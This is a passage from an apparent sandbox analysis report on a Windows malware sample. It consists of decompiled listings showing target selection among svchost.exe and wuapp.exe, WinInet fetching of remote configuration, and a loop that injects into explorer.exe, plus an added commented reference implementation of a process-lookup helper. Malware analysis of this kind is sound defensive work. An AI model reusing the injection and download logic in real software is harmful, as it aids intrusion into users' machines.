                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						_v8 = 0;
                                                                                                                                          						_t17 =  *_t11(_a8, 0, 0,  &_v8); // executed
                                                                                                                                          						if(_t17 != 0) {
                                                                                                                                          							L7:
                                                                                                                                          							FreeLibrary(_t22);
                                                                                                                                          							goto L8;
                                                                                                                                          						} else {
                                                                                                                                          							E00401A00(_a4, _v8);
                                                                                                                                          							__imp__CoTaskMemFree(_v8);
                                                                                                                                          							L4:
                                                                                                                                          							FreeLibrary(_t22);
                                                                                                                                          							return 1;
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
                                                                                                                                          • CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040800C
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00408029
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                                                          • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                                                          • API String ID: 2437428030-337183102
                                                                                                                                          • Opcode ID: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                                                          • Instruction ID: 5a5f59212e9234ed04b8ab6130e8ec1b5f2c4e940e4abc4082f6536912f10ee2
                                                                                                                                          • Opcode Fuzzy Hash: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                                                          • Instruction Fuzzy Hash: 6901F531640205BBDB215F60DE0AB9E3BA8EF08741F104035FD04B41E1EFB9DE249A9D
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00403150(intOrPtr _a4) {
                                                                                                                                          				short _v524;
                                                                                                                                          				int _t6;
                                                                                                                                          				void* _t11;
                                                                                                                                          				void* _t16;
                                                                                                                                          				char* _t17;
                                                                                                                                          				char* _t18;
                                                                                                                                          
                                                                                                                                          				if( *0x5d1314 == 0) {
                                                                                                                                          					if( *0x5d1318 == 0) {
                                                                                                                                          						_t17 = L"\\System32\\wuapp.exe";
                                                                                                                                          						_t18 = L"\\System32\\svchost.exe";
                                                                                                                                          					} else {
                                                                                                                                          						goto L4;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					if( *0x5d1318 != 0) {
                                                                                                                                          						L4:
                                                                                                                                          						_t17 = L"\\SysWOW64\\wuapp.exe";
                                                                                                                                          						_t18 = L"\\SysWOW64\\svchost.exe";
                                                                                                                                          					} else {
                                                                                                                                          						_t17 = L"\\notepad.exe";
                                                                                                                                          						_t18 = L"\\explorer.exe";
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
                                                                                                                                          				if(_t6 == 0 || _t6 > 0x104) {
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_t20 = _a4;
                                                                                                                                          					E00401A00(_a4,  &_v524);
                                                                                                                                          					E00401970(_a4, _t17);
                                                                                                                                          					_t11 = E00407ED0(_t20); // executed
                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                          						L11:
                                                                                                                                          						return 1;
                                                                                                                                          					} else {
                                                                                                                                          						E00401A00(_t20,  &_v524);
                                                                                                                                          						E00401970(_t20, _t18);
                                                                                                                                          						_t16 = E00407ED0(_t20);
                                                                                                                                          						if(_t16 != 0) {
                                                                                                                                          							goto L11;
                                                                                                                                          						} else {
                                                                                                                                          							return _t16;
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,74B04D40,00000000), ref: 004031A4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryWindows
                                                                                                                                          • String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
                                                                                                                                          • API String ID: 3619848164-3654143111
                                                                                                                                          • Opcode ID: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                                                          • Instruction ID: 5271e3ad36bb831133aa074bfbbea18cf9a940d0c74e058bf0f41e493ec8db13
                                                                                                                                          • Opcode Fuzzy Hash: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                                                          • Instruction Fuzzy Hash: 8B112B71A0220467D7206A15AC45BAB775CCB0535AF1405BBFD08F62E3D73E9F8582DE
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E00404DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
                                                                                                                                          				char _v1784;
                                                                                                                                          				intOrPtr _v1788;
                                                                                                                                          				char _v1792;
                                                                                                                                          				intOrPtr _v1796;
                                                                                                                                          				char _v2052;
                                                                                                                                          				intOrPtr _v2056;
                                                                                                                                          				char _v2568;
                                                                                                                                          				char _v3080;
                                                                                                                                          				intOrPtr _v3084;
                                                                                                                                          				char _v3148;
                                                                                                                                          				char _v3276;
                                                                                                                                          				intOrPtr _t41;
                                                                                                                                          				intOrPtr _t42;
                                                                                                                                          				intOrPtr _t43;
                                                                                                                                          				void* _t44;
                                                                                                                                          				void* _t46;
                                                                                                                                          				char _t52;
                                                                                                                                          				char _t62;
                                                                                                                                          				void* _t76;
                                                                                                                                          				short _t79;
                                                                                                                                          				void* _t84;
                                                                                                                                          				intOrPtr _t85;
                                                                                                                                          				void* _t86;
                                                                                                                                          				void* _t87;
                                                                                                                                          				void* _t88;
                                                                                                                                          				void* _t89;
                                                                                                                                          				void* _t92;
                                                                                                                                          				void* _t93;
                                                                                                                                          
                                                                                                                                          				_t93 = __eflags;
                                                                                                                                          				_t80 = __edx;
                                                                                                                                          				_t79 = __ecx;
                                                                                                                                          				E00401670( &_v3276, 0, 0xcc8);
                                                                                                                                          				_t41 =  *0x5d1bb4; // 0x1e
                                                                                                                                          				_t81 = _a4;
                                                                                                                                          				_v2056 = _t41;
                                                                                                                                          				_t42 =  *0x5d1bbc; // 0xa
                                                                                                                                          				_v1796 = _t42;
                                                                                                                                          				_t43 =  *0x5d1c24; // 0x0
                                                                                                                                          				_v1788 = _t43;
                                                                                                                                          				_t44 = E00404B00(_t79, __edx, _t93, _a4); // executed
                                                                                                                                          				_t84 = _t44;
                                                                                                                                          				_t87 = _t86 + 0x10;
                                                                                                                                          				_t94 = _t84;
                                                                                                                                          				if(_t84 != 0) {
                                                                                                                                          					L5:
                                                                                                                                          					_t46 = E004028F0(_t84, E00405000,  &_v3276);
                                                                                                                                          					_t88 = _t87 + 0xc;
                                                                                                                                          					_push(_t84);
                                                                                                                                          					if(_t46 >= 0) {
                                                                                                                                          						E00401510();
                                                                                                                                          						_t85 = _a12;
                                                                                                                                          						_t89 = _t88 + 4;
                                                                                                                                          						__eflags = _v2052;
                                                                                                                                          						if(_v2052 != 0) {
                                                                                                                                          							E004017E0(_t85 + 0x4c8,  &_v2052);
                                                                                                                                          							_t89 = _t89 + 8;
                                                                                                                                          						}
                                                                                                                                          						__eflags = _v3276;
                                                                                                                                          						if(_v3276 != 0) {
                                                                                                                                          							E004017E0(_t85,  &_v3276);
                                                                                                                                          							_t89 = _t89 + 8;
                                                                                                                                          						}
                                                                                                                                          						__eflags = _v3148;
                                                                                                                                          						if(_v3148 != 0) {
                                                                                                                                          							E004017E0(_t85 + 0x80,  &_v3148);
                                                                                                                                          							_t89 = _t89 + 8;
                                                                                                                                          						}
                                                                                                                                          						__eflags = _v3080;
                                                                                                                                          						if(_v3080 != 0) {
                                                                                                                                          							_t82 = _t85 + 0xc4;
                                                                                                                                          							E004017E0(_t85 + 0xc4,  &_v3080);
                                                                                                                                          							_t89 = _t89 + 8;
                                                                                                                                          							__eflags = _v1784;
                                                                                                                                          							if(_v1784 != 0) {
                                                                                                                                          								__eflags =  *0x5d1c28;
                                                                                                                                          								if( *0x5d1c28 != 0) {
                                                                                                                                          									_t62 = E00401740("9dbcf183762872d8917b8a19535a0c65",  &_v1784);
                                                                                                                                          									_t89 = _t89 + 8;
                                                                                                                                          									__eflags = _t62;
                                                                                                                                          									if(_t62 != 0) {
                                                                                                                                          										_t23 =  &_a20; // 0x404a7a
                                                                                                                                          										E004076A0(_t79, _t80, _t82, _a16,  *_t23,  &_v1784);
                                                                                                                                          										_t89 = _t89 + 0x10;
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          						__eflags = _v2568;
                                                                                                                                          						if(_v2568 != 0) {
                                                                                                                                          							E004017E0(_t85 + 0x2c4,  &_v2568);
                                                                                                                                          							_t89 = _t89 + 8;
                                                                                                                                          						}
                                                                                                                                          						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
                                                                                                                                          						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
                                                                                                                                          						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
                                                                                                                                          						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
                                                                                                                                          						_t52 = _v1792;
                                                                                                                                          						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
                                                                                                                                          						__eflags = _t52;
                                                                                                                                          						if(_t52 != 0) {
                                                                                                                                          							E004017E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
                                                                                                                                          						}
                                                                                                                                          						return 1;
                                                                                                                                          					} else {
                                                                                                                                          						E00401510();
                                                                                                                                          						goto L7;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					Sleep(0x2710);
                                                                                                                                          					_t84 = E00404B00(_t79, _t80, _t94, _t81);
                                                                                                                                          					_t87 = _t87 + 4;
                                                                                                                                          					if(_t84 != 0) {
                                                                                                                                          						goto L5;
                                                                                                                                          					} else {
                                                                                                                                          						_t76 = E004017B0("FALSE", "FALSE");
                                                                                                                                          						_t92 = _t87 + 8;
                                                                                                                                          						_t96 = _t76;
                                                                                                                                          						if(_t76 == 0) {
                                                                                                                                          							L7:
                                                                                                                                          							return 0;
                                                                                                                                          						} else {
                                                                                                                                          							_t83 = _a8;
                                                                                                                                          							_t84 = E00404B00(_t79, _t80, _t96, _a8);
                                                                                                                                          							_t87 = _t92 + 4;
                                                                                                                                          							_t97 = _t84;
                                                                                                                                          							if(_t84 != 0) {
                                                                                                                                          								goto L5;
                                                                                                                                          							} else {
                                                                                                                                          								Sleep(0x2710);
                                                                                                                                          								_t84 = E00404B00(_t79, _t80, _t97, _t83);
                                                                                                                                          								_t87 = _t87 + 4;
                                                                                                                                          								if(_t84 == 0) {
                                                                                                                                          									goto L7;
                                                                                                                                          								} else {
                                                                                                                                          									goto L5;
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          0x00404e42
                                                                                                                                          0x00404e44
                                                                                                                                          0x00404e49
                                                                                                                                          0x00000000
                                                                                                                                          0x00404e4b
                                                                                                                                          0x00404e55
                                                                                                                                          0x00404e5a
                                                                                                                                          0x00404e5d
                                                                                                                                          0x00404e5f
                                                                                                                                          0x00404eb0
                                                                                                                                          0x00404eb6
                                                                                                                                          0x00404e61
                                                                                                                                          0x00404e61
                                                                                                                                          0x00404e6a
                                                                                                                                          0x00404e6c
                                                                                                                                          0x00404e6f
                                                                                                                                          0x00404e71
                                                                                                                                          0x00000000
                                                                                                                                          0x00404e73
                                                                                                                                          0x00404e78
                                                                                                                                          0x00404e84
                                                                                                                                          0x00404e86
                                                                                                                                          0x00404e8b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404e8b
                                                                                                                                          0x00404e71
                                                                                                                                          0x00404e5f
                                                                                                                                          0x00404e49

APIs
• Part of subcall function 00404B00: InternetCrackUrlA.WININET(74B5EA30,00000000,?), ref: 00404B57
• Sleep.KERNEL32(00002710,?,?,74B5EA30,00000000), ref: 00404E36
• Part of subcall function 00404B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
• Part of subcall function 00404B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BCB
• Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404BE5
• Sleep.KERNEL32(00002710,?,?,?,?,?,?,74B5EA30,00000000), ref: 00404E78
• Part of subcall function 00404B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0040A200,846CF300,00000000), ref: 00404C52
• Part of subcall function 00404B00: InternetQueryOptionA.WININET(00000000,0000001F,74B5EA30,00000000), ref: 00404C8C
• Part of subcall function 00404B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 00404CAA
• Part of subcall function 00404B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC1
• Part of subcall function 00404B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 00404CF3
• Part of subcall function 00404B00: InternetCloseHandle.WININET(00000CC8), ref: 00404D9A
• Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404D9F
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
• String ID: 9dbcf183762872d8917b8a19535a0c65$FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$zJ@
• API String ID: 581717041-2119261568
• Opcode ID: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
• Instruction ID: 78b4ba5b10ac8112f2c62d6eddd8c7677888aa5bfa1098f5850d3e15ab47de6f
• Opcode Fuzzy Hash: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
• Instruction Fuzzy Hash: 9351C5B1D012155BEB21EB64DC41FDB77E86B44344F0405BBE90CB32C1EB38AA94CB95
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 92%
E00408450(char* __ecx, void* __eflags) {
	char _v8;
	char _v1032;
	char _v1036;
	long _v1040;
	char _v5136;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* _t24;
	intOrPtr _t27;
	void* _t29;
	intOrPtr _t30;
	void* _t34;
	void* _t35;
	intOrPtr _t39;
	signed int _t41;
	void* _t43;
	void* _t44;
	void* _t46;
	void* _t47;

	_t37 = __ecx;
	E00401BB0( &_v5136, 0, 0x1000);
	E00401BB0( &_v1036, 0, 0x404);
	E00401670( &_v1036, 0, 0x404);
	_v1036 = GetCurrentProcessId();
	E00401A00( &_v1032, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
	_t46 = _t44 + 0x2c;
	_push(_t35);
	_push(_t41);
	_push(_t39);
	L1:
	while(1) {
		if( *0x5d1314 == 0) {
			_t24 = E00407EF0("explorer.exe");
			_t47 = _t46 + 4;
			if(_t24 != 0) {
				_t37 =  &_v1036;
				E004029E0( &_v1036, 0x400000, _t24,  &_v1036, 0x404,  &_v8, E00408390);
				_t46 = _t47 + 0x18;
				goto L12;
			}
		} else {
			_v1040 = 0;
			_t29 = E004080E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000); // executed
			_t35 = _t29;
			_t46 = _t46 + 0xc;
			if(_t35 != 0) {
				_t41 = 0;
				if(_t35 != 0) {
					while(1) {
						_t30 =  *0x5d2118; // 0x0
						if(_t30 != 0) {
							goto L12;
						}
						_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
						if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
							L8:
							_t41 = _t41 + 1;
							if(_t41 < _t35) {
								continue;
							} else {
							}
						} else {
							_t34 = E004029E0(_t37, 0x400000, _t39,  &_v1036, 0x404,  &_v8, E00408390); // executed
							_t46 = _t46 + 0x18;
							if(_t34 == 0) {
								goto L8;
							}
						}
						goto L12;
					}
				}
				L12:
				_t27 =  *0x5d2118; // 0x0
				if(_t27 != 0) {
					ExitThread(0);
				}
				Sleep(0x1f4);
				continue;
			}
		}
		return 0;
	}
}
                                                                                                                                          0x00000000
                                                                                                                                          0x00408513
                                                                                                                                          0x00408501
                                                                                                                                          0x00408581
                                                                                                                                          0x00408581
                                                                                                                                          0x00408588
                                                                                                                                          0x0040859c
                                                                                                                                          0x0040859c
                                                                                                                                          0x0040858f
                                                                                                                                          0x00000000
                                                                                                                                          0x0040858f
                                                                                                                                          0x004084f1
                                                                                                                                          0x004085aa
                                                                                                                                          0x004085aa

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe, xrefs: 004084A7
                                                                                                                                          • explorer.exe, xrefs: 0040854D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentProcess$ExitSleepThread
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$explorer.exe
                                                                                                                                          • API String ID: 970816010-4081113559
                                                                                                                                          • Opcode ID: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                                                          • Instruction ID: 85ffc2236a6c84dd18c35f3841ea3bb67a2469adcd3a8cb5e8b5d398127c98f4
                                                                                                                                          • Opcode Fuzzy Hash: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                                                          • Instruction Fuzzy Hash: 02310DF5A40204B6EB10AB919E46FE7336C5714745F0400BFBF44B21D2EEB85E4986BD
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
    // Walks a Toolhelp32 process snapshot and returns the th32ProcessID of the first entry whose
    // szExeFile matches _a4; returns 0 when the snapshot cannot be taken or no entry matches.
    // _v300 is the PROCESSENTRY32 (dwSize 0x128 = 296 bytes), so _v292 is its th32ProcessID (+8)
    // and _v264 its szExeFile (+0x24). E00401740 compares _a4 with szExeFile and yields 0 on a match.
    // The return value of Process32First is not checked. The value in front of each statement is the
    // instruction address from the listing's address column.
    E00407EF0(intOrPtr _a4) {
        char _v264;
        intOrPtr _v292;
        void* _v300;
        void* _t9;
        void* _t13;
        int _t17;
        void* _t21;
        void* _t29;
        void* _t30;
        void* _t31;

        /* 0x00407efe */ _v300 = 0x128;                                      // dwSize = sizeof(PROCESSENTRY32)
        /* 0x00407f08 */ _t9 = CreateToolhelp32Snapshot(2, 0); // executed   // 2 = TH32CS_SNAPPROCESS
        /* 0x00407f0d */ _t29 = _t9;
        /* 0x00407f12 */ if(_t29 != 0xffffffff) {                            // INVALID_HANDLE_VALUE
        /* 0x00407f24 */     Process32First(_t29,  &_v300); // executed       // return value ignored
        /* 0x00407f29 */     _t26 = _a4;
        /* 0x00407f34 */     _t13 = E00401740(_a4,  &_v264);                 // compare _a4 with szExeFile
        /* 0x00407f39 */     _t31 = _t30 + 8;
        /* 0x00407f3e */     if(_t13 == 0) {
        /* 0x00407f85 */         L7:
        /* 0x00407f86 */         CloseHandle(_t29);
        /* 0x00407f97 */         return _v292;                               // th32ProcessID of the match
        /* 0x00407f40 */     } else {
        /* 0x00407f48 */         _t17 = Process32Next(_t29,  &_v300); // executed
        /* 0x00407f4f */         if(_t17 == 0) {
        /* 0x00407f76 */             L6:
        /* 0x00407f77 */             FindCloseChangeNotification(_t29); // executed   // closes the snapshot handle on this path too
        /* 0x00407f84 */             return 0;                               // not found
        /* 0x00407f51 */         } else {
        /* 0x00407f51 */             while(1) {
        /* 0x00407f59 */                 _t21 = E00401740(_t26,  &_v264);
        /* 0x00407f5e */                 _t31 = _t31 + 8;
        /* 0x00407f63 */                 if(_t21 == 0) {
        /*            */                     goto L7;
        /*            */                 }
        /* 0x00407f74 */                 if(Process32Next(_t29,  &_v300) != 0) {
        /*            */                     continue;
        /*            */                 } else {
        /*            */                     goto L6;
        /*            */                 }
        /*            */                 goto L8;
        /* 0x00407f74 */             }
        /*            */             goto L7;
        /* 0x00407f51 */         }
        /* 0x00407f4f */     }
        /* 0x00407f14 */ } else {
        /* 0x00407f1a */     return 0;                                       // snapshot failed
        /* 0x00407f1a */ }
        /*            */ L8:
    }

                                                                                                                                          APIs
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                                                          • Process32Next.KERNEL32 ref: 00407F48
                                                                                                                                          • Process32Next.KERNEL32 ref: 00407F6D
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process32$Next$ChangeCloseCreateFindFirstNotificationSnapshotToolhelp32
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4072508860-0
                                                                                                                                          • Opcode ID: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                                                          • Instruction ID: 2d56b8353110eab1b9b04cc9459ef1c3f068b5f37dea811fb5169f2e54792dba
                                                                                                                                          • Opcode Fuzzy Hash: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                                                          • Instruction Fuzzy Hash: CA11293190102967DB20A625AD41EEB73ACDF48325F0002BBFD48E21C1EB38DE5186AA
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
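
The decompiled E00407EF0 above is a find-PID-by-image-name helper: it walks a Toolhelp32 process snapshot and returns th32ProcessID of the first entry whose szExeFile matches the name passed in. The report's signature list notes process enumeration that checks for explorer.exe and svchost.exe, the usual precursors to thread injection, and the preceding listing's strings include explorer.exe. As an added reference implementation, not code from the sample or from the report, the following C shows the same lookup in readable form. The portable core runs over a constructed in-memory snapshot so it compiles anywhere; the wrapper under `_WIN32` calls the real Toolhelp32 APIs listed for the function and assumes an ANSI (non-UNICODE) build, so szExeFile is a char array. The names ProcEntry, find_pid_in_snapshot, find_pid_by_name and kSampleSnapshot, and the PIDs in the sample snapshot, are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/*
 * Constructed stand-in for the two PROCESSENTRY32 fields the decompiled
 * routine reads: th32ProcessID (offset 8) and szExeFile (offset 0x24,
 * MAX_PATH chars). Used only by the portable path below.
 */
typedef struct {
    uint32_t th32ProcessID;
    char     szExeFile[260];
} ProcEntry;

/* Image names are case-insensitive on Windows, so compare that way. */
static int image_name_equals(const char *a, const char *b)
{
    for (;; a++, b++) {
        int ca = tolower((unsigned char)*a);
        int cb = tolower((unsigned char)*b);
        if (ca != cb) return 0;
        if (ca == '\0') return 1;
    }
}

/*
 * Same control flow as E00407EF0: check the first entry, then each later
 * one, and return the PID of the first match or 0 when nothing matches
 * (the decompiled code also returns 0 on its "not found" path).
 */
uint32_t find_pid_in_snapshot(const ProcEntry *entries, size_t count,
                              const char *image_name)
{
    for (size_t i = 0; i < count; i++) {
        if (image_name_equals(entries[i].szExeFile, image_name))
            return entries[i].th32ProcessID;
    }
    return 0;
}

/* Constructed sample snapshot; the PIDs are made up for the demonstration. */
const ProcEntry kSampleSnapshot[] = {
    { 4,    "System" },
    { 612,  "csrss.exe" },
    { 1340, "svchost.exe" },
    { 2764, "explorer.exe" },
    { 3100, "P7Oa6i5muL.exe" },
};
const size_t kSampleSnapshotLen = sizeof(kSampleSnapshot) / sizeof(kSampleSnapshot[0]);

#ifdef _WIN32
#include <windows.h>
#include <tlhelp32.h>

/*
 * Windows build of the same lookup with the APIs from the function's API
 * list: CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS = 2, 0), Process32First,
 * Process32Next and CloseHandle. Unlike the sample, it checks the
 * Process32First result. dwSize must be set first or the call fails.
 */
uint32_t find_pid_by_name(const char *image_name)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE)
        return 0;

    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe);            /* 0x128 on a 32-bit ANSI build, as in the sample */
    uint32_t pid = 0;
    if (Process32First(snap, &pe)) {
        do {
            if (image_name_equals(pe.szExeFile, image_name)) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(snap, &pe));
    }
    CloseHandle(snap);                 /* closed on every path, as in the sample */
    return pid;
}
#endif

int main(void)
{
    uint32_t pid = find_pid_in_snapshot(kSampleSnapshot, kSampleSnapshotLen, "explorer.exe");
    printf("explorer.exe -> pid %u (constructed snapshot)\n", (unsigned)pid);
#ifdef _WIN32
    printf("explorer.exe -> pid %u (live Toolhelp32 snapshot)\n",
           (unsigned)find_pid_by_name("explorer.exe"));
#endif
    return 0;
}
```

The structure offsets in the lead-in follow from the decompiled locals: _v300 sits 36 bytes below _v264 and 8 bytes below _v292, which is exactly where szExeFile and th32ProcessID live inside a 296-byte PROCESSENTRY32. On a defender's side, the same API sequence (CreateToolhelp32Snapshot, Process32First, a Process32Next loop, then a memory-write or thread-creation call against the returned PID) is the behaviour the report's "enumerate process and check for explorer.exe or svchost.exe" signature keys on.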

                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                          			E004021A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                          				long _v8;
                                                                                                                                          				signed int _v16;
                                                                                                                                          				void* _v20;
                                                                                                                                          				signed int _v32;
                                                                                                                                          				intOrPtr _v36;
                                                                                                                                          				intOrPtr _v40;
                                                                                                                                          				char _v44;
                                                                                                                                          				signed int _t22;
                                                                                                                                          				void* _t24;
                                                                                                                                          				short _t27;
                                                                                                                                          				void* _t31;
                                                                                                                                          				signed int _t37;
                                                                                                                                          				signed int _t38;
                                                                                                                                          				void _t40;
                                                                                                                                          				signed int _t46;
                                                                                                                                          				void* _t52;
                                                                                                                                          				intOrPtr _t57;
                                                                                                                                          				void* _t61;
                                                                                                                                          				void* _t62;
                                                                                                                                          
                                                                                                                                          				_t46 = __edx;
                                                                                                                                          				_t22 =  *0x5d1128; // 0x736eff60
                                                                                                                                          				_t62 = _t61 - 0x28;
                                                                                                                                          				_t64 = _t22 |  *0x5d112c;
                                                                                                                                          				if((_t22 |  *0x5d112c) != 0) {
                                                                                                                                          					L3:
                                                                                                                                          					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4); // executed
                                                                                                                                          					_t52 = _t24;
                                                                                                                                          					__eflags = _t52;
                                                                                                                                          					if(_t52 != 0) {
                                                                                                                                          						_t2 = _t52 + 0x18; // 0x18
                                                                                                                                          						_t57 = _t2;
                                                                                                                                          						E004017E0(_t57, _a12);
                                                                                                                                          						asm("cdq");
                                                                                                                                          						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
                                                                                                                                          						 *(_t52 + 0x14) = _t46;
                                                                                                                                          						_t27 = E00401850(_t57);
                                                                                                                                          						asm("xorps xmm0, xmm0");
                                                                                                                                          						 *((short*)(_t52 + 8)) = _t27;
                                                                                                                                          						 *((short*)(_t52 + 0xa)) = _t27;
                                                                                                                                          						_t8 = _t52 + 8; // 0x8
                                                                                                                                          						 *_t52 = 0;
                                                                                                                                          						 *(_t52 + 4) = 0;
                                                                                                                                          						asm("cdq");
                                                                                                                                          						_v36 = _t8;
                                                                                                                                          						_v32 = _t46;
                                                                                                                                          						asm("cdq");
                                                                                                                                          						_v20 = _t52;
                                                                                                                                          						_v44 = _a4;
                                                                                                                                          						_v40 = _a8;
                                                                                                                                          						asm("movlpd [ebp-0x18], xmm0");
                                                                                                                                          						_v16 = _t46;
                                                                                                                                          						_t31 = E00401D10( *0x5d1128,  *0x5d112c,  &_v44, 4);
                                                                                                                                          						_t40 =  *_t52;
                                                                                                                                          						_v8 = 0;
                                                                                                                                          						_v8 =  *(_t52 + 4);
                                                                                                                                          						VirtualFree(_t52, 0, 0x8000); // executed
                                                                                                                                          						__eflags = _t31;
                                                                                                                                          						if(_t31 < 0) {
